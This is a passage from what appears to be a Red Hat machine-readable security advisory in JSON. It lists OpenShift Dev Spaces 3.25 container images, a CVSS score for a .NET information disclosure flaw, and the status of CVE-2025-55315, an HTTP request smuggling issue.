"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "dotnet: .NET Information Disclosure Vulnerability"
},
{
"cve": "CVE-2025-55315",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2025-10-10T13:21:09.125000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2403085"
}
],
"notes": [
{
"category": "description",
